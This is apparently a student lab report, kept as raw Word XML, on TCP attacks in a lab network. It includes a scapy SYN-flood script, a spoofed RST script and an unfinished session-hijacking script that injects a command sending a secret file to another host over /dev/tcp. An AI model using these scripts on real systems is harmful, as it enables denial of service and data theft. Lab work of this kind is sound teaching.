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790CDF" w14:textId="1F989218" w:rsidR="00593545" w:rsidRDefault="00270775" w:rsidP="00593545">
      <w:r>
        <w:t xml:space="preserve">Task 1.1 </w:t>
      </w:r>
      <w:r>
        <w:t>: Launching the Attack Using Python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B296029" w14:textId="3D5ADCA3" w:rsidR="00270775" w:rsidRDefault="00270775" w:rsidP="00593545"/>
    <w:p w14:paraId="61CF2797" w14:textId="26C6592A" w:rsidR="00270775" w:rsidRDefault="00270775" w:rsidP="00593545">
      <w:r>
        <w:t>Code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64532CFA" w14:textId="77777777" w:rsidR="00270775" w:rsidRDefault="00270775" w:rsidP="00270775">
      <w:r>
        <w:t>#!/bin/env python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F14C0F" w14:textId="77777777" w:rsidR="00270775" w:rsidRDefault="00270775" w:rsidP="00270775"/>
    <w:p w14:paraId="74FFC219" w14:textId="77777777" w:rsidR="00270775" w:rsidRDefault="00270775" w:rsidP="00270775">
      <w:r>
        <w:t>from scapy.all import IP, TCP, send</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C63371" w14:textId="77777777" w:rsidR="00270775" w:rsidRDefault="00270775" w:rsidP="00270775">
      <w:r>
        <w:t>from ipaddress import IPv4Address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B0415A" w14:textId="77777777" w:rsidR="00270775" w:rsidRDefault="00270775" w:rsidP="00270775">
      <w:r>
        <w:t>from random import getrandbits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC80896" w14:textId="77777777" w:rsidR="00270775" w:rsidRDefault="00270775" w:rsidP="00270775"/>
    <w:p w14:paraId="20FE5C1A" w14:textId="77777777" w:rsidR="00270775" w:rsidRDefault="00270775" w:rsidP="00270775">
      <w:r>
        <w:t>ip  = IP(dst="10.9.0.5")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="592023CA" w14:textId="77777777" w:rsidR="00270775" w:rsidRDefault="00270775" w:rsidP="00270775">
      <w:r>
        <w:t>tcp = TCP(dport=23, flags='S')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4109EE20" w14:textId="77777777" w:rsidR="00270775" w:rsidRDefault="00270775" w:rsidP="00270775">
      <w:r>
        <w:t>pkt = ip/tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35011120" w14:textId="77777777" w:rsidR="00270775" w:rsidRDefault="00270775" w:rsidP="00270775"/>
    <w:p w14:paraId="04FAC7C1" w14:textId="77777777" w:rsidR="00270775" w:rsidRDefault="00270775" w:rsidP="00270775">
      <w:r>
        <w:t>while True:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23CDE366" w14:textId="77777777" w:rsidR="00270775" w:rsidRDefault="00270775" w:rsidP="00270775">
      <w:r>
        <w:t xml:space="preserve">    pkt[IP].src   = str(IPv4Address(getrandbits(32))) # source ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9980F2" w14:textId="77777777" w:rsidR="00270775" w:rsidRDefault="00270775" w:rsidP="00270775">
      <w:r>
        <w:t xml:space="preserve">    pkt[IP].sport = getrandbits(16)     # source port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F482EE" w14:textId="77777777" w:rsidR="00270775" w:rsidRDefault="00270775" w:rsidP="00270775">
      <w:r>
        <w:t xml:space="preserve">    pkt[IP].seq   = getrandbits(32)     # sequence number </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22575DC7" w14:textId="41B05C94" w:rsidR="00270775" w:rsidRDefault="00270775" w:rsidP="00270775">
      <w:r>
        <w:t xml:space="preserve">    send(pkt,iface='br-37825f7f3e3e', verbose = 0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25DC7B2D" w14:textId="166E25EC" w:rsidR="003429DD" w:rsidRDefault="003429DD" w:rsidP="00270775"/>
    <w:p w14:paraId="275D5C37" w14:textId="77777777" w:rsidR="00B774C5" w:rsidRDefault="003429DD" w:rsidP="00270775">
      <w:r>
        <w:t>Screenshot</w:t>
      </w:r>
      <w:r w:rsidR="00B774C5">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB18788" w14:textId="66D8D482" w:rsidR="003429DD" w:rsidRDefault="003429DD" w:rsidP="00270775">
      <w:r>
        <w:t xml:space="preserve"> Running the script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1254C9C4" w14:textId="59CD1534" w:rsidR="003429DD" w:rsidRDefault="003429DD" w:rsidP="00270775"/>
    <w:p w14:paraId="2BB36427" w14:textId="7171FD4F" w:rsidR="003429DD" w:rsidRDefault="003429DD" w:rsidP="00270775">
      <w:r w:rsidRPr="003429DD">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="33D28E08" wp14:editId="360FDC69">
            <wp:extent cx="5731510" cy="1171575"/>
            <wp:effectExtent l="0" t="0" r="2540" b="952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BC01" w14:textId="4349D5E9" w:rsidR="00B774C5" w:rsidRDefault="00B774C5" w:rsidP="00270775"/>
    <w:p w14:paraId="02A030BA" w14:textId="567A0452" w:rsidR="00B774C5" w:rsidRDefault="00B774C5" w:rsidP="00270775"/>
    <w:p w14:paraId="220492D6" w14:textId="2481EC71" w:rsidR="00B774C5" w:rsidRDefault="00B774C5" w:rsidP="00270775"/>
    <w:p w14:paraId="27587695" w14:textId="77777777" w:rsidR="00B774C5" w:rsidRDefault="00B774C5" w:rsidP="00270775"/>
    <w:p w14:paraId="31EE21CD" w14:textId="69E97DCF" w:rsidR="00B774C5" w:rsidRDefault="00B774C5" w:rsidP="00270775">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Checking weather the attack passed or failed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D8C4C3C" w14:textId="07C9E934" w:rsidR="00B774C5" w:rsidRDefault="00B774C5" w:rsidP="00270775">
      <w:r w:rsidRPr="00B774C5">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="42B9CD48" wp14:editId="1D398902">
            <wp:extent cx="5731510" cy="21196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36C5" w14:textId="04B61D54" w:rsidR="00B774C5" w:rsidRDefault="00B774C5" w:rsidP="00270775"/>
    <w:p w14:paraId="598FD95C" w14:textId="0A35EA38" w:rsidR="00B774C5" w:rsidRDefault="00B774C5" w:rsidP="00270775">
      <w:r>
        <w:t>My attack failed to succeed this attack we need follow few commands as below:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA5944E" w14:textId="77777777" w:rsidR="00ED4B8D" w:rsidRDefault="00B774C5" w:rsidP="00270775">
      <w:r>
        <w:t>Step</w:t>
      </w:r>
      <w:r w:rsidR="00ED4B8D">
        <w:t xml:space="preserve">s </w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="150D2A1A" w14:textId="5F6F9A36" w:rsidR="00B774C5" w:rsidRDefault="00ED4B8D" w:rsidP="00270775">
      <w:r>
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidR="00B774C5">
        <w:t xml:space="preserve"> Changing the queue size as default </w:t>
      </w:r>
      <w:r w:rsidR="00657748">
        <w:t>my queue size is 128, I’m changing it to 64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0170BD0C" w14:textId="5D3015C1" w:rsidR="00B774C5" w:rsidRDefault="00B774C5" w:rsidP="00270775">
      <w:r w:rsidRPr="00B774C5">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="01E897B0" wp14:editId="66C74504">
            <wp:extent cx="5731510" cy="6680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F83BA" w14:textId="062D3EA8" w:rsidR="00657748" w:rsidRDefault="00657748" w:rsidP="00270775"/>
    <w:p w14:paraId="10C95C78" w14:textId="30AA5F06" w:rsidR="00657748" w:rsidRDefault="00657748" w:rsidP="00270775">
      <w:r w:rsidRPr="00657748">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="76F92204" wp14:editId="25C3A149">
            <wp:extent cx="5731510" cy="3009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1263" w14:textId="577BE062" w:rsidR="00ED4B8D" w:rsidRDefault="00ED4B8D" w:rsidP="00270775"/>
    <w:p w14:paraId="465BF67A" w14:textId="510B8F38" w:rsidR="00ED4B8D" w:rsidRDefault="00ED4B8D" w:rsidP="00270775"/>
    <w:p w14:paraId="43823C92" w14:textId="7078AA2A" w:rsidR="00ED4B8D" w:rsidRDefault="00ED4B8D" w:rsidP="00270775">
      <w:r>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:t>: A kernel mitigation mechanism</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6024FCC0" w14:textId="060144C5" w:rsidR="00ED4B8D" w:rsidRDefault="00ED4B8D" w:rsidP="00270775"/>
    <w:p w14:paraId="79B7E612" w14:textId="3826C1B4" w:rsidR="00ED4B8D" w:rsidRDefault="00ED4B8D" w:rsidP="00270775">
      <w:r>
        <w:t>Removing the previous telnet entries using flush command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01DD7F60" w14:textId="296C2E57" w:rsidR="00ED4B8D" w:rsidRDefault="00ED4B8D" w:rsidP="00270775"/>
    <w:p w14:paraId="363A7662" w14:textId="460BFFBD" w:rsidR="00ED4B8D" w:rsidRDefault="00ED4B8D" w:rsidP="00270775">
      <w:r w:rsidRPr="00ED4B8D">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="320D8B34" wp14:editId="7D5BD400">
            <wp:extent cx="5731510" cy="3213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D7F7" w14:textId="3290048F" w:rsidR="00C2496B" w:rsidRDefault="00C2496B" w:rsidP="00270775"/>
    <w:p w14:paraId="5A0BB604" w14:textId="0E52B004" w:rsidR="00C2496B" w:rsidRDefault="00C2496B" w:rsidP="00270775"/>
    <w:p w14:paraId="7F16DB15" w14:textId="77777777" w:rsidR="00C2496B" w:rsidRDefault="00C2496B" w:rsidP="00270775">
      <w:r>
        <w:t xml:space="preserve">Redoing the attack , we can’t connect to telnet if our attack succeed. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D39046" w14:textId="6FBE6DBF" w:rsidR="00C2496B" w:rsidRDefault="00C2496B" w:rsidP="00270775">
      <w:r w:rsidRPr="00C2496B">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="33D73308" wp14:editId="474F79F1">
            <wp:extent cx="5731510" cy="5854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FF80" w14:textId="77777777" w:rsidR="00C2496B" w:rsidRDefault="00C2496B" w:rsidP="00C2496B">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>This time the attack got succeed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77852C86" w14:textId="7FA3C34D" w:rsidR="00C2496B" w:rsidRDefault="00C2496B" w:rsidP="00270775"/>
    <w:p w14:paraId="48886D63" w14:textId="34D95817" w:rsidR="00F32F1F" w:rsidRDefault="00F32F1F" w:rsidP="00270775"/>
    <w:p w14:paraId="11153E21" w14:textId="76FD2E4F" w:rsidR="00F32F1F" w:rsidRDefault="00F32F1F" w:rsidP="00270775"/>
    <w:p w14:paraId="69E680FC" w14:textId="4AEF4027" w:rsidR="00F32F1F" w:rsidRDefault="00F32F1F" w:rsidP="00270775"/>
    <w:p w14:paraId="577CF4A1" w14:textId="6FAF9C0C" w:rsidR="00F32F1F" w:rsidRDefault="00F32F1F" w:rsidP="00270775">
      <w:r>
        <w:t xml:space="preserve">Task 1.2 </w:t>
      </w:r>
      <w:r>
        <w:t>Launch the Attack Using C</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F025B91" w14:textId="587F9008" w:rsidR="00E10556" w:rsidRDefault="00E10556" w:rsidP="00270775"/>
    <w:p w14:paraId="30C57240" w14:textId="4D28507F" w:rsidR="00E10556" w:rsidRDefault="00E10556" w:rsidP="00270775">
      <w:r>
        <w:t>Compiling C program:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA4FA25" w14:textId="0B193C01" w:rsidR="00E10556" w:rsidRDefault="00E10556" w:rsidP="00270775">
      <w:r w:rsidRPr="00E10556">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D88653C" wp14:editId="09EAADC6">
            <wp:extent cx="5731510" cy="4978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B93E" w14:textId="76127947" w:rsidR="00E10556" w:rsidRDefault="00E10556" w:rsidP="00270775"/>
    <w:p w14:paraId="3DC39F5D" w14:textId="35021AD9" w:rsidR="00E10556" w:rsidRDefault="00E10556" w:rsidP="00270775">
      <w:r>
        <w:t>Running the C program in container:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CCCC2D0" w14:textId="66BFC5FE" w:rsidR="00E10556" w:rsidRDefault="00E10556" w:rsidP="00270775">
      <w:r w:rsidRPr="00E10556">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B033D24" wp14:editId="4C5B2196">
            <wp:extent cx="5731510" cy="1235075"/>
            <wp:effectExtent l="0" t="0" r="2540" b="31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8B4C" w14:textId="49BBBD46" w:rsidR="0060794A" w:rsidRDefault="0060794A" w:rsidP="00270775"/>
    <w:p w14:paraId="4258F807" w14:textId="3A6E08A0" w:rsidR="0060794A" w:rsidRDefault="0060794A" w:rsidP="00270775">
      <w:r>
        <w:t>Attack Succeed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A4DB48C" w14:textId="239566D8" w:rsidR="0060794A" w:rsidRDefault="0060794A" w:rsidP="00270775">
      <w:r w:rsidRPr="0060794A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="11240A48" wp14:editId="7B7BB6F2">
            <wp:extent cx="5731510" cy="146939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426A" w14:textId="06DB9D1A" w:rsidR="005521A0" w:rsidRDefault="005521A0" w:rsidP="00270775"/>
    <w:p w14:paraId="32269196" w14:textId="0CAC089A" w:rsidR="005521A0" w:rsidRDefault="005521A0" w:rsidP="00270775"/>
    <w:p w14:paraId="3ED2BF02" w14:textId="35F67902" w:rsidR="005521A0" w:rsidRDefault="005521A0" w:rsidP="00270775"/>
    <w:p w14:paraId="4B8D0DEE" w14:textId="7D5C32E2" w:rsidR="005521A0" w:rsidRDefault="005521A0" w:rsidP="00270775"/>
    <w:p w14:paraId="5518F69F" w14:textId="39BA089B" w:rsidR="005521A0" w:rsidRDefault="005521A0" w:rsidP="00270775"/>
    <w:p w14:paraId="30E8E9CB" w14:textId="725DCF29" w:rsidR="005521A0" w:rsidRDefault="005521A0" w:rsidP="00270775"/>
    <w:p w14:paraId="13E13D80" w14:textId="430116AA" w:rsidR="005521A0" w:rsidRDefault="005521A0" w:rsidP="00270775"/>
    <w:p w14:paraId="1BCF5652" w14:textId="39EB686C" w:rsidR="005521A0" w:rsidRDefault="005521A0" w:rsidP="00270775">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Task 1.3: </w:t>
      </w:r>
      <w:r>
        <w:t>Enable the SYN Cookie Countermeasure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1711DC51" w14:textId="3BC6A4ED" w:rsidR="005521A0" w:rsidRDefault="005521A0" w:rsidP="00270775">
      <w:r>
        <w:t xml:space="preserve">Enabling SYN cookie measuring </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB1FD07" w14:textId="19B83D4D" w:rsidR="005521A0" w:rsidRDefault="005521A0" w:rsidP="00270775">
      <w:r>
        <w:t>Screenshot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C1480D3" w14:textId="5D439ECB" w:rsidR="005521A0" w:rsidRDefault="005521A0" w:rsidP="00270775">
      <w:r w:rsidRPr="005521A0">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="062FC105" wp14:editId="10BC3991">
            <wp:extent cx="5731510" cy="105219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7CBC" w14:textId="1FF92002" w:rsidR="005521A0" w:rsidRDefault="005521A0" w:rsidP="00270775"/>
    <w:p w14:paraId="5F8D449D" w14:textId="1B8754C1" w:rsidR="005521A0" w:rsidRDefault="005521A0" w:rsidP="00270775">
      <w:r>
        <w:t>Running Task 1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31CB2E4E" w14:textId="62DE1FA7" w:rsidR="005521A0" w:rsidRDefault="005521A0" w:rsidP="00270775">
      <w:r w:rsidRPr="005521A0">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5934CD34" wp14:editId="0CA64CD4">
            <wp:extent cx="5731510" cy="1258570"/>
            <wp:effectExtent l="0" t="0" r="2540" b="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442C" w14:textId="5A514B83" w:rsidR="005521A0" w:rsidRDefault="005521A0" w:rsidP="00270775"/>
    <w:p w14:paraId="7BCAC06B" w14:textId="4C83EEF4" w:rsidR="005521A0" w:rsidRDefault="005521A0" w:rsidP="00270775">
      <w:r>
        <w:t>Output for above program:</w:t>
      </w:r>
      <w:r w:rsidRPr="005521A0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005521A0">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6B9EBC00" wp14:editId="439F2CBC">
            <wp:extent cx="4884420" cy="4415243"/>
            <wp:effectExtent l="0" t="0" r="0" b="444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6631" cy="44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DFCD7" w14:textId="5A46772C" w:rsidR="005521A0" w:rsidRDefault="005521A0" w:rsidP="00270775">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Running task 1.2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD7E9BA" w14:textId="61F6EDF8" w:rsidR="005521A0" w:rsidRDefault="005521A0" w:rsidP="00270775">
      <w:r w:rsidRPr="005521A0">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1AF2811B" wp14:editId="644FBC47">
            <wp:extent cx="5387807" cy="1577477"/>
            <wp:effectExtent l="0" t="0" r="381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3ECD" w14:textId="78BA140A" w:rsidR="005521A0" w:rsidRDefault="005521A0" w:rsidP="00270775"/>
    <w:p w14:paraId="159FAE1C" w14:textId="05FAD991" w:rsidR="005521A0" w:rsidRDefault="005521A0" w:rsidP="00270775">
      <w:r>
        <w:t>Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0379481A" w14:textId="1CC3D804" w:rsidR="005521A0" w:rsidRDefault="005521A0" w:rsidP="00270775">
      <w:r w:rsidRPr="005521A0">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F82CD3D" wp14:editId="7916B649">
            <wp:extent cx="5731510" cy="501459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C621" w14:textId="3CB7AE10" w:rsidR="00094667" w:rsidRDefault="00094667" w:rsidP="00270775"/>
    <w:p w14:paraId="6D9D7FFD" w14:textId="40FE2D23" w:rsidR="00094667" w:rsidRDefault="00094667" w:rsidP="00270775">
      <w:r>
        <w:t>The attacks fail in both approaches because when we enable the syncookies it won’t allocated any servers unless a request is legitimistic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="721662A4" w14:textId="5FD31FFE" w:rsidR="001B21EA" w:rsidRDefault="001B21EA" w:rsidP="00270775"/>
    <w:p w14:paraId="417F3B33" w14:textId="490EEAE5" w:rsidR="001B21EA" w:rsidRDefault="001B21EA" w:rsidP="00270775"/>
    <w:p w14:paraId="5C562516" w14:textId="23CCB1A7" w:rsidR="001B21EA" w:rsidRDefault="00085536" w:rsidP="00270775">
      <w:r>
        <w:t>Task 2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC8129B" w14:textId="5C7EB453" w:rsidR="00085536" w:rsidRDefault="00085536" w:rsidP="00270775"/>
    <w:p w14:paraId="03D8C346" w14:textId="6FA17B67" w:rsidR="00085536" w:rsidRDefault="00085536" w:rsidP="00270775">
      <w:r>
        <w:t>Code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01EDAB38" w14:textId="77777777" w:rsidR="00085536" w:rsidRDefault="00085536" w:rsidP="00085536">
      <w:r>
        <w:t>#!/usr/bin/env python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15CE2E21" w14:textId="77777777" w:rsidR="00085536" w:rsidRDefault="00085536" w:rsidP="00085536">
      <w:r>
        <w:t>from scapy.all import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21CC76F8" w14:textId="77777777" w:rsidR="00085536" w:rsidRDefault="00085536" w:rsidP="00085536"/>
    <w:p w14:paraId="3BFCBD71" w14:textId="77777777" w:rsidR="00085536" w:rsidRDefault="00085536" w:rsidP="00085536">
      <w:r>
        <w:t>ip  = IP(src="10.9.0.6", dst="10.9.0.5")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FC7E7A" w14:textId="77777777" w:rsidR="00085536" w:rsidRDefault="00085536" w:rsidP="00085536">
      <w:r>
        <w:t>tcp = TCP(sport=38144, dport=23, flags="R", seq=3270507957)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168CF3C7" w14:textId="77777777" w:rsidR="00085536" w:rsidRDefault="00085536" w:rsidP="00085536">
      <w:r>
        <w:t>pkt = ip/tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3870CA86" w14:textId="77777777" w:rsidR="00085536" w:rsidRDefault="00085536" w:rsidP="00085536">
      <w:r>
        <w:t>ls(pkt)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21080778" w14:textId="5A16371E" w:rsidR="00085536" w:rsidRDefault="00085536" w:rsidP="00085536">
      <w:r>
        <w:t>send(pkt, verbose=0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ACBAB66" w14:textId="727B6FBF" w:rsidR="00085536" w:rsidRDefault="00085536" w:rsidP="00270775"/>
    <w:p w14:paraId="047AF0CB" w14:textId="214D5BD5" w:rsidR="00085536" w:rsidRDefault="00085536" w:rsidP="00270775">
      <w:r>
        <w:t>Screenshots:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC8BD5E" w14:textId="6AFE5B4D" w:rsidR="00085536" w:rsidRDefault="00085536" w:rsidP="00270775">
      <w:r>
        <w:t>Doing telnet :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="196DE137" w14:textId="2DAFC11D" w:rsidR="00085536" w:rsidRDefault="00085536" w:rsidP="00270775">
      <w:r w:rsidRPr="00085536">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="62E351EE" wp14:editId="4C659211">
            <wp:extent cx="5731510" cy="2317115"/>
            <wp:effectExtent l="0" t="0" r="2540" b="698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30CE" w14:textId="5D3FAA3C" w:rsidR="00925C17" w:rsidRDefault="00925C17" w:rsidP="00270775"/>
    <w:p w14:paraId="6E72B103" w14:textId="40FDAB8A" w:rsidR="00925C17" w:rsidRDefault="00925C17" w:rsidP="00270775"/>
    <w:p w14:paraId="5EAA92E4" w14:textId="50D212CA" w:rsidR="00925C17" w:rsidRDefault="00925C17" w:rsidP="00270775"/>
    <w:p w14:paraId="2627A0AF" w14:textId="594C101F" w:rsidR="00925C17" w:rsidRDefault="00925C17" w:rsidP="00270775"/>
    <w:p w14:paraId="56135817" w14:textId="3F275A99" w:rsidR="00925C17" w:rsidRDefault="00925C17" w:rsidP="00270775"/>
    <w:p w14:paraId="63CB7D2A" w14:textId="108DAF71" w:rsidR="00925C17" w:rsidRDefault="00925C17" w:rsidP="00270775"/>
    <w:p w14:paraId="4636F452" w14:textId="77777777" w:rsidR="00925C17" w:rsidRDefault="00925C17" w:rsidP="00270775"/>
    <w:p w14:paraId="4423FBDC" w14:textId="304B21F6" w:rsidR="00925C17" w:rsidRDefault="00925C17" w:rsidP="00270775">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Wireshark screenshot before resetting:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77136E31" w14:textId="23BACCF0" w:rsidR="00925C17" w:rsidRDefault="00925C17" w:rsidP="00270775">
      <w:r w:rsidRPr="00925C17">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14F04F29" wp14:editId="7446DAAA">
            <wp:extent cx="5731510" cy="1908175"/>
            <wp:effectExtent l="0" t="0" r="254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D067" w14:textId="60CBE89E" w:rsidR="003B3D94" w:rsidRDefault="003B3D94" w:rsidP="00270775"/>
    <w:p w14:paraId="09A7D024" w14:textId="05E8A749" w:rsidR="003B3D94" w:rsidRDefault="003B3D94" w:rsidP="00270775"/>
    <w:p w14:paraId="49664375" w14:textId="0245D430" w:rsidR="003B3D94" w:rsidRDefault="003B3D94" w:rsidP="00270775">
      <w:r>
        <w:t>Running resetting program:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE9E936" w14:textId="0A8FB05A" w:rsidR="003B3D94" w:rsidRDefault="003B3D94" w:rsidP="00270775">
      <w:r w:rsidRPr="003B3D94">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B1552A9" wp14:editId="064E729D">
            <wp:extent cx="5731510" cy="2793365"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6985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32D4" w14:textId="7B3E5D9E" w:rsidR="003B3D94" w:rsidRDefault="003B3D94" w:rsidP="00270775"/>
    <w:p w14:paraId="229A6ECF" w14:textId="1999D125" w:rsidR="003B3D94" w:rsidRDefault="003B3D94" w:rsidP="00270775"/>
    <w:p w14:paraId="3CF93908" w14:textId="400DB169" w:rsidR="003B3D94" w:rsidRDefault="003B3D94" w:rsidP="00270775"/>
    <w:p w14:paraId="685BEA40" w14:textId="293682AD" w:rsidR="003B3D94" w:rsidRDefault="003B3D94" w:rsidP="00270775"/>
    <w:p w14:paraId="2B3FF021" w14:textId="4EEBEE31" w:rsidR="003B3D94" w:rsidRDefault="003B3D94" w:rsidP="00270775"/>
    <w:p w14:paraId="4C1D9D39" w14:textId="2725823A" w:rsidR="003B3D94" w:rsidRDefault="003B3D94" w:rsidP="00270775"/>
    <w:p w14:paraId="6501C1D6" w14:textId="0F76159F" w:rsidR="003B3D94" w:rsidRDefault="003B3D94" w:rsidP="00270775"/>
    <w:p w14:paraId="4028374C" w14:textId="61DE43D6" w:rsidR="003B3D94" w:rsidRDefault="003B3D94" w:rsidP="00270775"/>
    <w:p w14:paraId="26DD51CB" w14:textId="1397A58D" w:rsidR="003B3D94" w:rsidRDefault="003B3D94" w:rsidP="00270775"/>
    <w:p w14:paraId="3BB6CCAB" w14:textId="77777777" w:rsidR="003B3D94" w:rsidRDefault="003B3D94" w:rsidP="00270775"/>
    <w:p w14:paraId="08944A33" w14:textId="04A33EA4" w:rsidR="003B3D94" w:rsidRDefault="003B3D94" w:rsidP="00270775">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Wireshark after running  reset program:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A6D42D" w14:textId="5B1D91CC" w:rsidR="003B3D94" w:rsidRDefault="003B3D94" w:rsidP="00270775">
      <w:r w:rsidRPr="003B3D94">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="510FB729" wp14:editId="28C07B13">
            <wp:extent cx="5731510" cy="2358390"/>
            <wp:effectExtent l="0" t="0" r="2540" b="381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3580" w14:textId="7D6422AC" w:rsidR="00742A6A" w:rsidRDefault="00742A6A" w:rsidP="00270775"/>
    <w:p w14:paraId="05932303" w14:textId="0CD1FBA5" w:rsidR="00742A6A" w:rsidRDefault="00742A6A" w:rsidP="00270775">
      <w:r>
        <w:t>Task 3:</w:t>
      </w:r>
      <w:r w:rsidR="000A19A2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EAFA781" w14:textId="4374D813" w:rsidR="000A19A2" w:rsidRDefault="000A19A2" w:rsidP="00270775">
      <w:r>
        <w:t>Code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3D4E30" w14:textId="77777777" w:rsidR="00083AD9" w:rsidRDefault="00083AD9" w:rsidP="00083AD9">
      <w:r>
        <w:t>#!/usr/bin/env python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59ED6672" w14:textId="77777777" w:rsidR="00083AD9" w:rsidRDefault="00083AD9" w:rsidP="00083AD9">
      <w:r>
        <w:t>from scapy.all import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0380098C" w14:textId="77777777" w:rsidR="00083AD9" w:rsidRDefault="00083AD9" w:rsidP="00083AD9"/>
    <w:p w14:paraId="61FAE313" w14:textId="77777777" w:rsidR="00083AD9" w:rsidRDefault="00083AD9" w:rsidP="00083AD9">
      <w:r>
        <w:t>ip  = IP(src="10.9.0.6", dst="10.9.0.5")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E637FA" w14:textId="77777777" w:rsidR="00083AD9" w:rsidRDefault="00083AD9" w:rsidP="00083AD9">
      <w:r>
        <w:t>tcp = TCP(sport=59312, dport=23, flags="A", seq=709682135, ack=1631078258)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AFE571F" w14:textId="77777777" w:rsidR="00083AD9" w:rsidRDefault="00083AD9" w:rsidP="00083AD9">
      <w:r>
        <w:t>data = "\ncat /home/seed/secret &gt; /dev/tcp/10.9.0.1/9090\n"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A613048" w14:textId="77777777" w:rsidR="00083AD9" w:rsidRDefault="00083AD9" w:rsidP="00083AD9">
      <w:r>
        <w:t>pkt = ip/tcp/data</w:t>
      </w:r>
